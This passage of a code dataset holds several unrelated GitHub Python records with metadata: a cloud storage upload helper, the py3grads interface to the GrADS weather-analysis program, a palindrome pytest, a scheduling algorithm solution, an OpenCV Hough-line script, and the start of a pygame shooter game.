google.cloud import storage\n\nimport sys\nimport numpy as np\nimport cv2\nimport os\n\n\ndef singleBlobUpload(_bucket_name, 
_source_file_name, _destination_blob):\n \"\"\"\n Uploads a file to the bucket:\n _bucket_name: The ID of your GCS bucket\n _source_file_name: The path to the file to upload\n _destination_blon: The path to the file in GCS bucket\n \"\"\"\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(_bucket_name)\n destination_blob_name = _destination_blob\n blob = bucket.blob(destination_blob_name)\n\n # Optional: set a generation-match precondition to avoid potential race conditions\n # and data corruptions. The request to upload is aborted if the object's\n # generation number does not match your precondition. For a destination\n # object that does not yet exist, set the if_generation_match precondition to 0.\n # If the destination object already exists in your bucket, set instead a\n # generation-match precondition using its generation number.\n generation_match_precondition = 0\n\n try:\n blob.upload_from_filename(\n _source_file_name, if_generation_match=generation_match_precondition)\n except Exception as e:\n print(f\"Error when upload {_source_file_name} to bucket: {e}\")\n return False\n\n print(f\"File {_source_file_name} uploaded to bucket: {destination_blob_name}\")\n return True\n", "repo_name": "acsii-63/cloud-based", "sub_path": "module/rabbitmq.py", "file_name": "rabbitmq.py", "file_ext": "py", "file_size_in_byte": 1414, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "google.cloud.storage.Client", "line_number": 19, "usage_type": "call"}, {"api_name": "google.cloud.storage", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "24604124038", "text": "\"\"\"\nPython 3 interface to GrADS, inspired by the work of Arlindo da Silva on PyGrADS.\nA GrADS object is used to pass commands to a GrADS instance and parse the output.\n\nBasic Usage:\n from py3grads import Grads\n ga = Grads()\n # Example command\n output, rc = ga('query config')\n\nVersion: 1.1\n\nTested with: GrADS v2.1.a3, v2.1.0\n\nAuthor: Levi Cowan \n\"\"\"\n\n__all__ = ['GrADSError', 'PygradsError', 'Grads', 'GaEnv']\n\nfrom collections import OrderedDict\nfrom datetime import datetime\nfrom io import BytesIO\nfrom itertools import product\nimport numpy as np\nimport re\nfrom subprocess import Popen, PIPE, STDOUT\n\n###############################################\n# Custom Exceptions #\n###############################################\n\nclass GrADSError(Exception):\n pass\n\nclass PygradsError(Exception):\n pass\n\n###############################################\n# GrADS Interface #\n###############################################\nclass Grads:\n def __init__(self, launch='grads -bul', verbose=True):\n \"\"\"\n The primary interface to GrADS. User commands can be passed in as input\n to be executed after the object is initialized.\n\n Args:\n launch: The system command to launch GrADS. The flags '-b', '-u', and\n either '-l' or '-p' are required in order to collect GrADS output\n without shell interactivity. Other flags may be specified.\n Default flags are '-bul'.\n\n verbose: If True, will print all output.\n \"\"\"\n self.verbose = verbose\n\n # GrADS launch arguments. 
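A hypothetical call to singleBlobUpload above; the bucket and object names are invented, and Application Default Credentials are assumed to be configured for storage.Client():

```python
# Returns True on success; False (after printing the error) otherwise
ok = singleBlobUpload(
    _bucket_name="my-example-bucket",
    _source_file_name="frames/frame_0001.jpg",
    _destination_blob="uploads/frame_0001.jpg",
)
```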
Ensure required flags are included.\n args = launch.split()\n executable = args[0]\n opts = args[1:] if len(args) > 1 else []\n givenflags = [a[1:] for a in args if a.startswith('-')]\n # We may have to add new flags if required\n newflags = ''\n # Batch mode '-b' and unbuffered mode '-u' are required\n for flag in 'bu':\n if not any([flag in fset for fset in givenflags]):\n newflags += flag\n # Landscape or portrait mode must be specified at launch\n if not any(['l' in fset or 'p' in fset for fset in givenflags]):\n # Default to landscape\n newflags += 'l'\n args = (executable, '-'+newflags, *opts) if newflags else (executable, *opts)\n\n # Launch the GrADS process\n self.p = Popen(args, bufsize=0, stdin=PIPE, stdout=PIPE, stderr=STDOUT,\n universal_newlines=False)\n\n # Define regex matching ANSI formatting\n self.ansi = re.compile(r'\\x1b[^m]*m')\n\n # Dismiss initial launch output\n splashlines, rc = self._parse_output(verbose=self.verbose)\n\n # Detect GrADS build if possible, but don't crash here\n try:\n versionstr = splashlines[0].split('Version')[-1]\n self.build = 'opengrads' if 'oga' in versionstr else 'grads'\n except:\n self.build = 'grads'\n\n self.MISSING = -9.99e8\n\n def __call__(self, gacmd):\n \"\"\"\n Allow commands to be passed to the GrADS object\n \"\"\"\n outlines, rc = self.cmd(gacmd)\n if rc > 0:\n print('\\n'.join(outlines))\n raise GrADSError('GrADS returned rc='+str(rc)\n +' for the following command:\\n'+gacmd)\n return outlines, rc\n\n def __del__(self):\n \"\"\"\n Call the GrADS quit command, close pipes, and terminate the\n subprocess. An error here is not fatal.\n \"\"\"\n try:\n self.cmd('quit')\n self.p.stdin.close()\n self.p.stdout.close()\n self.p.terminate()\n except:\n pass\n\n def _parse_output(self, marker='IPC', verbose=True, encoding='utf-8'):\n \"\"\"\n Collect and return GrADS output from stdout.\n\n Args:\n marker: The tag name bounding relevant output.\n verbose: If True, each line of output is printed to stdout.\n encoding: Expected character encoding of the GrADS output\n Returns:\n lines: List containing all lines of output\n rc: The return code (int)\n \"\"\"\n markstart = '<'+marker+'>'\n markend = ''\n lines = []\n out = ''\n rc = -1\n # Output is contained within stream marker tags\n # First get to the next markstart tag\n while markstart not in out:\n out = self.filter_output(self.p.stdout.readline().decode(encoding))\n if len(out) == 0:\n raise GrADSError(\"GrADS terminated.\")\n # Collect output between marker tags\n out = self.filter_output(self.p.stdout.readline().decode(encoding))\n while markend not in out:\n if len(out) > 0:\n # Get return code\n if '' in out:\n rc = int(out.split()[1])\n # Collect all other lines\n else:\n # Get rid of newline at the end\n lines.append(out[:-1])\n if verbose:\n print(lines[-1])\n else:\n raise GrADSError(\"GrADS terminated.\")\n out = self.filter_output(self.p.stdout.readline().decode(encoding))\n\n return lines, rc\n\n def move_pointer(self, marker, encoding='utf-8', verbose=False):\n \"\"\"\n Move the GrADS stream pointer to the given marker.\n The marker only has to match a portion of a line of output.\n\n Additional Args:\n encoding: Expected character encoding of the GrADS output\n \"\"\"\n out = ''\n while marker not in out:\n out = self.filter_output(self.p.stdout.readline().decode(encoding))\n if verbose:\n print(out)\n if len(out) == 0:\n raise GrADSError(\"GrADS terminated.\")\n return\n\n def filter_output(self, output):\n \"\"\"\n Perform filtering on GrADS output, such as removing 
ANSI formatting.\n \"\"\"\n # Filter out ANSI formatting in OpenGrADS\n output = self.ansi.sub('', output)\n return output\n\n def cmd(self, gacmd, verbose=True, block=True, encoding='utf-8'):\n \"\"\"\n Run a GrADS command.\n\n Args:\n gacmd: The command string to be executed.\n verbose: If False, suppress output to stdout\n block: If True, block and collect all output.\n encoding: Expected character encoding of the GrADS output\n Returns:\n outlines: List of output lines from GrADS.\n rc: GrADS return code (int)\n \"\"\"\n # Always need a carriage return at the end of the input\n if gacmd[-1] != '\\n':\n gacmd += '\\n'\n # Input to GrADS is always UTF-8 bytes\n self.p.stdin.write(gacmd.encode('utf-8'))\n self.p.stdin.flush()\n # Collect output\n if block:\n # Let global verbose=False override if local verbose is True\n if verbose:\n outlines, rc = self._parse_output(encoding=encoding, verbose=self.verbose)\n else:\n outlines, rc = self._parse_output(encoding=encoding, verbose=False)\n output = '\\n'.join(outlines)\n if 'Syntax Error' in output:\n raise GrADSError('Syntax Error while evaluating '+gacmd)\n else:\n outlines = []\n rc = 0\n\n return outlines, rc\n\n def flush(self, encoding='utf-8'):\n \"\"\"\n Flush the GrADS output pipe. This may be necessary when\n the output stream ends but the stream pointer is decoupled\n from its marker. At this point the output pipe hangs.\n If it is known in advance that this will happen, calling\n flush() will reset the pointer by running an ubiquitous command.\n \"\"\"\n self.cmd('q config', verbose=False, encoding=encoding)\n\n def env(self, query='all'):\n \"\"\"\n Query and return the GrADS dimension and display environment.\n This function is designed to make a new query every time it is\n called in order to avoid problems when assuming the last known\n state has not changed. A snapshot of the environment at a specific\n time can be saved by assigning a variable to a call of this function.\n \"\"\"\n return GaEnv(self, query)\n\n def exp(self, expr):\n \"\"\"\n Export a GrADS field to a Numpy array. Since only up to 2-dimensional\n data can be written out by GrADS, requesting arrays of rank > 2 will be\n less efficient than defining the same array in GrADS.\n\n Args:\n expr: GrADS expression representing the field to be exported.\n \"\"\"\n # Get the current environment\n env = self.env()\n dimnames = ('x','y','z','t','e') # ordered by GrADS read efficiency\n # Detect which dimensions are varying\n dims = [dim for dim in dimnames if not getattr(env, dim+'fixed')]\n # We can only display/output data from GrADS up to 2 dimensions at a\n # time, so for rank > 2, we must fix the extra dimensions. 
For best\n # efficiency, always select the two fastest dimensions to vary.\n varying, fixed = dims[:2], dims[2:]\n # Varying dimensions must be ordered identically to GrADS fwrite output\n fwrite_order = ['z','y','x','t','e']\n varying.sort(key=lambda dim: fwrite_order.index(dim))\n output_dims = varying + fixed\n # For common cases, it is desirable to enforce a certain dimension\n # order in the output array for the first two axes\n output_orders2D = OrderedDict([\n ('xy', ['y','x']), ('xz', ['z','x']), ('yz', ['z','y']),\n ('xt', ['t','x']), ('yt', ['y','t']), ('zt', ['z','t'])\n ])\n # Check for 2D base dimensions in order of preference\n for first2, order in output_orders2D.items():\n if set(first2).issubset(dims):\n ordered_dims = order + [d for d in dims if d not in order]\n break\n else:\n ordered_dims = dims\n # Read data into Numpy array\n if len(dims) <= 2:\n arr = self._read_array(expr, varying)\n else:\n dimvals = {}\n for dim in dims:\n mn, mx = getattr(env, dim+'i')\n dimvals[dim] = range(mn, mx+1)\n # Sets of fixed coordinates for which to request arrays while the\n # first two (most efficient) dimensions vary\n coordinates = product(*[dimvals[dim] for dim in fixed])\n arr = None # Need to wait to define until we know shape of arr2D\n for coords in coordinates:\n # Set fixed dimensions and get array indices\n idx = []\n for dim, c in zip(fixed, coords):\n self.cmd('set {dim} {c}'.format(dim=dim, c=c))\n idx.append(dimvals[dim].index(c))\n # Get 2D array\n arr2D = self._read_array(expr, varying)\n # Define full data array\n if arr is None:\n arr = np.zeros(arr2D.shape + tuple(len(dimvals[d]) for d in fixed))\n # Assign data along first two dimensions\n arr[(slice(None), slice(None)) + tuple(idx)] = arr2D\n # Re-order axes if necessary\n axes = [(i, output_dims.index(d)) for i, d in zip(range(len(dims)), ordered_dims)]\n swapped = []\n for a1, a2 in axes:\n pair = sorted([a1, a2])\n if a1 != a2 and pair not in swapped:\n arr = np.swapaxes(arr, a1, a2)\n swapped.append(pair)\n # Restore original GrADS dimension environment\n for dim in dims:\n mn, mx = getattr(env, dim)\n self.cmd('set {dim} {mn} {mx}'.format(dim=dim, mn=mn, mx=mx))\n return arr\n\n def _read_array(self, expr, dims):\n \"\"\"\n Read a GrADS field into a Numpy array. The rank of the array must\n be 2 or less.\n\n Args:\n expr: GrADS expression representing the field to be read.\n dims: List of GrADS varying dimension names defining the\n space occupied by expr.\n \"\"\"\n encoding = 'latin-1'\n env = self.env()\n # Enable GrADS binary output to stream\n self.cmd('set gxout fwrite', verbose=False)\n self.cmd('set fwrite -st -', verbose=False)\n # Don't block output here so we can intercept the data stream\n self.cmd('display '+expr, verbose=False, block=False)\n # Move stream pointer to '<FWRITE>'\n self.move_pointer('<FWRITE>', encoding=encoding, verbose=False)\n # Read binary data from stream\n handle = BytesIO()\n chsize = 4096 # Read data in 4096-byte chunks\n rcpattern = re.compile(b'\\n\\s?-?\\d+\\s?\\<\\/RC\\>') # pattern of RC tag\n while True:\n chunk = self.p.stdout.read(chsize)\n # We know we're at the end when we encounter a return code wrapped\n # in RC tags, immediately following a newline. 
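It is worth seeing why the RC-tag regex above anchors on a preceding newline. A self-contained check on synthetic bytes (invented here, not real GrADS output) shows that a bare '<RC>' inside binary float data is ignored while the newline-prefixed return-code tag terminates the read:

    import re

    # raw-bytes equivalent of the pattern compiled above
    rcpattern = re.compile(rb'\n\s?-?\d+\s?</RC>')
    data = b'\x00<RC>\x01\x02' + b'\n 0 </RC>'    # fake payload + real terminator
    m = rcpattern.search(data)
    payload = data[:m.span()[0]]                  # keep only the data before the tag
    print(payload)                                # b'\x00<RC>\x01\x02'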
(\\n {number} )\n # Must be very precise in detecting this because '' by itself\n # can appear in a binary data stream.\n endmatch = rcpattern.search(chunk)\n if endmatch:\n # Cut out whatever data precedes the tag\n handle.write(chunk[:endmatch.span()[0]])\n # The ending character of the last chunk is arbitrary,\n # we only know that is in it.\n # Thus, need to flush GrADS pipes to avoid hanging\n # and reset the pointer to the next marker.\n self.flush(encoding=encoding)\n break\n else:\n handle.write(chunk)\n # If GrADS is sane, normal behavior is to return the array of grid points\n # big enough to completely enclose or overlap the set domain.\n dimlengths = [getattr(env, 'n'+dim) for dim in dims]\n guess_shape = tuple(dimlengths)\n guess_size = int(np.prod(guess_shape))\n try:\n # Convert binary data to 32-bit floats\n arr = np.fromstring(handle.getvalue(), dtype=np.float32)\n except:\n raise PygradsError('Problems occurred while exporting GrADS expression: '+expr\n +'\\nCommon reasons:'\n +'\\n\\t1) Dimensions which are fixed/varying in the expression '\n +'\\n\\t must be fixed/varying in the GrADS environment.'\n +'\\n\\t2) One or more of your GrADS dimensions may extend out of bounds.')\n # If all is sane and expected\n if arr.size == guess_size:\n shape = guess_shape\n else:\n # For whatever reason, GrADS will sometimes return a grid offset\n # by an index or two from what the dimension environment says it\n # should be (e.g. nx*ny for an x-y field). To work around this,\n # test a few perturbations around the expected size of a single\n # dimension at a time and see if any of them work.\n possible_shapes = []\n dim_ranges = []\n for n in dimlengths:\n if n > 2:\n r = range(n-2, n+3)\n else:\n r = range(1, n+3)\n dim_ranges.append(r)\n # Remember, dim order determines how the shape tuples here are ordered\n possible_shapes = list(product(*dim_ranges))\n possible_sizes = [np.prod(shape) for shape in possible_shapes]\n # Actual shape of the grid. This assumes that if multiple possible\n # shapes have the same size, the first one that works is correct.\n # This will not always be true...blame GrADS for having unpredictable\n # grid sizes\n shape = possible_shapes[possible_sizes.index(arr.size)]\n arr = arr.reshape(shape)\n arr[arr == self.MISSING] = np.nan\n # Close stream\n self.cmd('disable fwrite', verbose=False)\n # Restore gxout settings, assuming typical 2D scalar field plot\n self.cmd('set gxout '+env.gx2Dscalar, verbose=False)\n return arr\n\n###############################################\n# GrADS Environment Handle #\n###############################################\nclass GaEnv:\n def __init__(self, ga, query='all'):\n \"\"\"\n Container for holding GrADS dimension and display environment data.\n The information is derived from GrADS query commands ['dims','gxout'].\n A specific query may be requested if only one is needed. Default\n is to load all supported queries.\n \"\"\"\n # Query dims\n if query in ('dims', 'all'):\n qdims, rc = ga.cmd('query dims', verbose=ga.verbose)\n if rc > 0:\n raise GrADSError('Error running \"query dims\"')\n\n # Current open file ID\n self.fid = int(qdims[0].split()[-1])\n # Which dimensions are varying or fixed?\n self.xfixed = 'fixed' in qdims[1]\n self.yfixed = 'fixed' in qdims[2]\n self.zfixed = 'fixed' in qdims[3]\n self.tfixed = 'fixed' in qdims[4]\n self.efixed = 'fixed' in qdims[5]\n\n # Get the dimension values. 
These are single numbers if the dimension\n # is fixed, or a tuple of (dim1, dim2) if the dimension is varying.\n # Grid coordinates x,y,z,t,e can be non-integers for varying dimensions,\n # but it is useful to have the \"proper\" integer grid coordinates xi,yi,zi,ti,ei.\n # If a dimension is fixed, GrADS automatically rounds non-integer dimensions\n # to the nearest integer.\n xinfo = qdims[1].split()\n if self.xfixed:\n self.lon = float(xinfo[5])\n self.x = float(xinfo[8])\n self.xi = int(np.round(self.x))\n else:\n self.lon = (float(xinfo[5]), float(xinfo[7]))\n self.x = (float(xinfo[10]), float(xinfo[12]))\n self.xi = (int(np.floor(self.x[0])), int(np.ceil(self.x[1])))\n yinfo = qdims[2].split()\n if self.yfixed:\n self.lat = float(yinfo[5])\n self.y = float(yinfo[8])\n self.yi = int(np.round(self.y))\n else:\n self.lat = (float(yinfo[5]), float(yinfo[7]))\n self.y = (float(yinfo[10]), float(yinfo[12]))\n self.yi = (int(np.floor(self.y[0])), int(np.ceil(self.y[1])))\n zinfo = qdims[3].split()\n if self.zfixed:\n self.lev = float(zinfo[5])\n self.z = float(zinfo[8])\n self.p = float(zinfo[5])\n self.zi = int(np.round(self.z))\n else:\n self.lev = (float(zinfo[5]), float(zinfo[7]))\n self.z = (float(zinfo[10]), float(zinfo[12]))\n self.p = (float(zinfo[5]), float(zinfo[7]))\n self.zi = (int(np.floor(self.z[0])), int(np.ceil(self.z[1])))\n tinfo = qdims[4].split()\n if len(tinfo[5]) > 12:\n timefmt = '%H:%MZ%d%b%Y'\n else:\n timefmt = '%HZ%d%b%Y'\n if self.tfixed:\n self.time = datetime.strptime(tinfo[5], timefmt)\n self.t = float(tinfo[8])\n self.ti = int(np.round(self.t))\n else:\n self.time = (datetime.strptime(tinfo[5], timefmt),\n datetime.strptime(tinfo[7], timefmt))\n self.t = (float(tinfo[10]), float(tinfo[12]))\n self.ti = (int(np.floor(self.t[0])), int(np.ceil(self.t[1])))\n einfo = qdims[5].split()\n if self.efixed:\n self.e = float(einfo[8])\n self.ei = int(np.round(self.e))\n else:\n self.e = (float(einfo[10]), float(einfo[12]))\n self.ei = (int(np.floor(self.e[0])), int(np.ceil(self.e[1])))\n\n # Dimension lengths in the current environment.\n # Different from total dimension length in the file (see ctlinfo)\n if self.xfixed:\n self.nx = 1\n else:\n self.nx = self.xi[1] - self.xi[0] + 1\n if self.yfixed:\n self.ny = 1\n else:\n self.ny = self.yi[1] - self.yi[0] + 1\n if self.zfixed:\n self.nz = 1\n else:\n self.nz = self.zi[1] - self.zi[0] + 1\n if self.tfixed:\n self.nt = 1\n else:\n self.nt = self.ti[1] - self.ti[0] + 1\n if self.efixed:\n self.ne = 1\n else:\n self.ne = self.ei[1] - self.ei[0] + 1\n\n # Rank of the environment space (number of dimensions)\n self.rank = sum([not d for d in\n [self.xfixed,self.yfixed,self.zfixed,self.tfixed,self.efixed]])\n\n # Query ctlinfo\n if query in ('ctlinfo', 'all'):\n qctl, rc = ga.cmd('query ctlinfo', verbose=ga.verbose)\n if rc > 0:\n raise GrADSError('Error running \"query ctlinfo\"')\n # Total dimension lengths in the file\n self.Ne = 1\n for line in qctl:\n if 'xdef ' in line or 'XDEF ' in line:\n self.Nx = int(line.split()[1])\n elif 'ydef ' in line or 'YDEF ' in line:\n self.Ny = int(line.split()[1])\n elif 'zdef ' in line or 'ZDEF ' in line:\n self.Nz = int(line.split()[1])\n elif 'tdef ' in line or 'TDEF ' in line:\n self.Nt = int(line.split()[1])\n # EDEF section may or may not be present\n elif 'edef ' in line or 'EDEF ' in line:\n self.Ne = int(line.split()[1])\n\n # Query gxout\n if query in ('gxout', 'all'):\n qgxout, rc = ga.cmd('query gxout', verbose=ga.verbose)\n if rc > 0:\n raise GrADSError('Error running \"query 
gxout\"')\n # gxout defines graphics types for 1D scalar plots, 1D vector plots,\n # 2D scalar plots, and 2D vector plots.\n # Map GrADS graphic identifiers to gxout commands. Note that \"gxout stat\"\n # and \"gxout print\" do not change the output of \"query gxout\"\n graphicTypes = {'Contour': 'contour', 'Line': 'line', 'Barb': 'barb',\n '16': 'shaded', '17': 'shade2b', 'Shaded': 'shade1',\n 'Vector': 'vector', 'Shapefile': 'shp', 'Bar': 'bar',\n 'Grid': 'grid', 'Grfill': 'grfill', 'Stream': 'stream',\n 'Errbar': 'errbar', 'GeoTIFF': 'geotiff', 'Fgrid': 'fgrid',\n 'ImageMap': 'imap', 'KML': 'kml', 'Linefill': 'linefill',\n 'Scatter': 'scatter', 'Fwrite': 'fwrite', '0': None}\n\n # Get current graphics settings\n self.gx1Dscalar = graphicTypes[qgxout[1].split()[-1]]\n self.gx1Dvector = graphicTypes[qgxout[2].split()[-1]]\n self.gx2Dscalar = graphicTypes[qgxout[3].split()[-1]]\n self.gx2Dvector = graphicTypes[qgxout[4].split()[-1]]\n stationData = qgxout[5].split()[-1]\n if stationData == '6':\n self.stationData = None\n else:\n self.stationData = stationData\n\n # Query gxinfo\n if query in ('gxinfo', 'all'):\n qgxinfo, rc = ga.cmd('query gxinfo', verbose=ga.verbose)\n if rc > 0:\n raise GrADSError('Error running \"query gxinfo\"')\n # Get page limits and the current plot's limits in page coordinates\n line1 = qgxinfo[1].split()\n self.pagewidth, self.pageheight = line1[3], line1[5]\n line2 = qgxinfo[2].split()\n self.Xplot = (float(line2[3]), float(line2[5]))\n line3 = qgxinfo[3].split()\n self.Yplot = (float(line3[3]), float(line3[5]))\n", "repo_name": "meridionaljet/py3grads", "sub_path": "py3grads/gacore.py", "file_name": "gacore.py", "file_ext": "py", "file_size_in_byte": 24365, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "52", "api": [{"api_name": "subprocess.Popen", "line_number": 75, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 75, "usage_type": "name"}, {"api_name": "subprocess.STDOUT", "line_number": 75, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 79, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 263, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 305, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 333, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 361, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 394, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 450, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 450, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.floor", 
"line_number": 461, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 461, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 468, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 468, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 470, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 472, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 472, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 473, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 473, "usage_type": "name"}, {"api_name": "numpy.floor", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 479, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 482, "usage_type": "call"}]} +{"seq_id": "6950993482", "text": "from ....problems.Two_Pointers.Valid_Palindrome import Solution\nimport pytest\n\n\n@pytest.mark.parametrize(\n \"s, expected\",\n [\n (\"A man, a plan, a canal: Panama\", True),\n (\"race a car\", False),\n (\" \", True)\n ]\n)\ndef test_is_palindrome_parametrize(s: str, expected: bool) -> bool:\n test = Solution()\n\n assert test.isPalindrome(s) == expected\n", "repo_name": "LuisAPC/pytest_with_Leetcode", "sub_path": "tests/problems/Two_Pointers/test_Valid_Palindrome.py", "file_name": "test_Valid_Palindrome.py", "file_ext": "py", "file_size_in_byte": 375, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "problems.Two_Pointers.Valid_Palindrome.Solution", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 5, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "73509932324", "text": "# 중복조합\nfrom itertools import combinations_with_replacement as comb_re\n\ndef solution(k, n, req):\n answer = float('inf')\n\n # 해당 과목에서 최대 배치 가능한 인원 수\n l = n - k + 1\n\n # 유형 배치도\n master_info = [[[float('inf'), float('inf')] for _ in range(l)] for _ in range(k)]\n\n def do_councel(councel_info, req=req):\n waiting_time = 0\n\n # 초기화\n for i in range(k):\n temp_councel_cnt = councel_info[i]\n for j in range(l):\n if j < temp_councel_cnt:\n master_info[i][j] = [0, 0]\n else:\n master_info[i][j] = [float('inf'), float('inf')]\n\n for mentee_info in req:\n req_time, spent_time, council_type = mentee_info\n\n # 해당 유형의 멘토들 상담 정보\n mento_timetable = master_info[council_type - 1]\n\n # 종료시간이 제일 빠른 순으로 정렬되어 있는 리스트의 첫 항목\n mento_info = mento_timetable[0]\n\n # 멘토_인포 = [종료시간, 시작시간]\n curr_end = mento_info[0]\n no_delay = curr_end <= req_time\n\n if no_delay:\n mento_info[1] = req_time\n mento_info[0] = req_time + spent_time\n else:\n waiting_time += mento_info[0] - req_time\n if waiting_time > answer:\n return float('inf')\n\n mento_info[1] = mento_info[0]\n mento_info[0] += spent_time\n\n # 각 항목의 멘토 시간 정보 중 0번 인덱스가 제일 일찍 끝나는 멘토 시간 정보가 되도록 정렬\n master_info[council_type - 1].sort()\n\n return waiting_time \n\n\n def set_schedule():\n nonlocal answer\n\n for arr in list(comb_re(range(k), n - k)):\n councel_info = [1] * k\n for idx in arr:\n councel_info[idx] += 1\n answer = min(answer, do_councel(councel_info))\n\n set_schedule()\n\n return answer", "repo_name": "caddyspoon/Algorithms_Breaker", 
"sub_path": "2023/08/pg214188_councel_schedules.py", "file_name": "pg214188_councel_schedules.py", "file_ext": "py", "file_size_in_byte": 2078, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.combinations_with_replacement", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "73247720805", "text": "import numpy as np\nfrom PIL import Image\nimport cv2\nimport math\nimport statistics\n\ndata = np.load(\"test.npy\")\n# Transform array into image\nimg = Image.fromarray(np.uint8(data[3] * 255), 'L')\nimg.show()\nimg.save(\"img.jpg\")\n# Read Image\nimg2 = cv2.imread('img.jpg')\n\n# Find the edges in the image using canny detector\nedges = cv2.Canny(img2, 50, 200)\n# Detect points that form a line\nlines = cv2.HoughLines(edges, 1, np.pi/360, 150)\n\nangle = []\nfor i in lines:\n rho = i[0][0]\n theta = i[0][1]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n\n cv2.line(img2, (x1, y1), (x2, y2), (0, 0, 255), 2)\n c = math.degrees(math.atan2(y2-y1, x2-x1))\n angle.append(abs(c))\nprint(angle[0:4])\na_mean = statistics.mean(angle[0:4])\nprint(180-a_mean)\n", "repo_name": "gjbergues/Dial", "sub_path": "hough.py", "file_name": "hough.py", "file_ext": "py", "file_size_in_byte": 898, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.load", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.Canny", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.HoughLines", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 33, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 34, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 34, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "4971309591", "text": "import pygame\nimport os\nimport sys \nimport random\n\n\"\"\"\n\nIdea: \n* Space shooter type game where you are a triangle, and move around shooting different shapes like circles, squares, and more that are chasing you.\n* You will have to survive waves of enemies, once a wave is over a new one starts. The goal is to survive 5 waves of enemies to win.\n* You will be able to buy upgrades between waves.\n\nSteps to create game idea:\n1. Game window - [Done]\n2. Make player character - [Done]\n3. Let the player move using WASD or Arrow keys - [Done]\n4. Implement shooting mechanic - [Done]\n5. Implement max_health to player and enemy types - [Done]\n6. Implement enemy and collision so that once an enemy is hit a certain amount of times they die - [Done]\n7. Implement wave system - [Done]\n\nDisclaimer: The sound effects and music are not mine, I optain them from (Pixabay.com) all the credit goes to the authors that created them. 
